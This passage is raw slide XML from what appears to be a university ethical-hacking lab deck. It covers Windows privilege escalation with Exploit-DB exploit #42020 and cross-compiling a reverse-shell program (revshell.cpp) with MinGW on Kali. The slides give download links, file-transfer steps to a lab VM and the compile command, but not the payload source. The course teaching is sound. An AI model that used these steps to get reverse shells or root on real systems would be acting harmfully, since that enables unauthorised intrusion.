              <a:t>https://drive.google.com/file/d/1HhnW_LA1W22Bbnt7AmcXTk2xrIvHOcpb/view?usp=sharing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>For 32bit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://drive.google.com/file/d/1uPHs88kfX__eJ29fIZ0Ogo_EdayCXEtX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Copy into your Windows VM as your limited user and launch it </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Try copying with Python's Simple HTTP Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>python3 -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>http.server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Then browse to http://10.10.0.10:8000 in Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Run and Root!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7022144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2C67B-7C0A-4C8D-A7DE-3EB0A79172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F6A3C-7707-4548-99D2-FBA57ECCD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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="97972" y="184462"/>
            <a:ext cx="8921796" cy="4857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24586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Cross Compiling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1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232018"/>
      </p:ext>
    </p:extLst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153AE-1BD6-4AF2-BD48-65A890C7CA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D7570B-14A9-480A-8AA4-AE5EE5F8A1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In this last section, we will cross compile a reverse shell payload in Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Once compiled, we'll copy it to our target and get a reverse shell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2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22D5A-7EA0-444E-8206-EB8B87410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MinGW Install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7D24-CAD7-4A43-89E5-0FDA641C43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 dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>MinGW has many compilers for different languages that can be used on Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>The C++ Compiler is actually just g++, takes same options and arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>More Information:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.mingw.org/wiki/Getting_Started</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Straight forward installation on Kali (required 800+ MB)</a:t>
            </a:r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 err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>apt-get install mingw-w64</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Also will need to add additional libraries and dependencies depending on what the exploit needs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856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D5D9B-5C2D-42B2-B4E6-901E185635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42020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B1FB3-6830-4228-8506-E814E98997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Check out the exploit we just used for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivEsc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #42020</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review the source code and the headers we will need</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>less /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>exploitdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/exploits/windows/local/42020.cpp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some of these headers are included with MinGW but we would need to download the Windows SDK for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4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bits.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>#include &lt;bits4_0.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4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stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4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tchar.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4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lm.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#include &lt;string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4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comdef.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4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winternl.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>Shlwapi.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4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strsafe.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="569912" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>#include &lt;vector&gt;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4FD86-F741-374E-9CB6-C313D372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67" y="2701159"/>
            <a:ext cx="2461180" cy="197640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00950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121E6-D093-4D26-BFEB-5DC88E9D6F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MinGW Headers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BEF98A-C1CC-417B-8EAB-CAEC581FFD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4879" y="801349"/>
            <a:ext cx="3940860" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>MinGW comes with many headers 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g++ already has some locations for headers that it will look at</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>MinGW includes other locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where it searches for them </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>with -v </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/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843FA-BBF9-433A-963B-0488F399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17" y="801349"/>
            <a:ext cx="4758522" cy="4195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86EAC3-5B7A-46ED-8492-BF3C8311C8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3324497" y="2351314"/>
            <a:ext cx="997720" cy="953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C447E3-33A7-4150-9030-B580AFB52F51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775166" y="1286694"/>
            <a:ext cx="4389120" cy="32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5523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AB0A5-EDE4-40CF-AA51-0C6937FFEC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Headers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709C37-2C2E-4F7A-BB32-343115C146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we need to add new headers, we will need to either include their folder </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-I</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Or put the headers into one of the existing folders which are included</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/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/include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Problems though:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even if we provide the headers from Windows SDK, we may learn that there are nested #includes in each headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows file system filenames are not case sensitive, but Linux is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hlwapi.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;  	// will not use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hlwapi.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some programs are good candidates for cross compiling but anything that required Visual Studio, .NET, Visual C++ dependencies are best compiled in those environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Such as the exploit 42020.cpp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24356112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AECDF-312A-4C51-B214-AF8DB218B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3CEB1B-E4C8-4EDB-B697-5A73C3ADA1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5570279" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Since 42020 is not a good example, let's compile a custom reverse shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Grab the revshell.cpp from the lab page, or here:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://drive.google.com/file/d/12wRs9BAIBue0FkV_CQ2Ebh8Axx6f3hz8/view?usp=sharing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This exploit does require some Windows headers, but they are ones that are included with MinGW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Compile it with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>minGW</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>i686-w64-mingw32-g++ revshell.cpp -o revshell.exe -lws2_32 -s -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>ffunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>-sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US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4DA9A-72C9-4209-B72A-454F14B65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30" y="921704"/>
            <a:ext cx="2861940" cy="3317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6605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AF894A-0EA5-4479-BA62-2BFF843C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" y="101934"/>
            <a:ext cx="8817958" cy="4939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8483650"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="nyu_labs_hack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u_labs_hack" id="{7E7FE2BD-3C48-450A-992F-CF1B704B874C}" vid="{A46D607A-B76A-47A9-9DAB-3505B49EEF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nyu_labs_hack</Template>
  <TotalTime>4314</TotalTime>
  <Words>5464</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>898</Paragraphs>
  <Slides>100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Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>nyu_labs_hack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New York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Jenna Bresnahan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Peter Klabe</cp:lastModifiedBy>
  <cp:revision>155</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-03T13:03:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-09T02:38:19Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>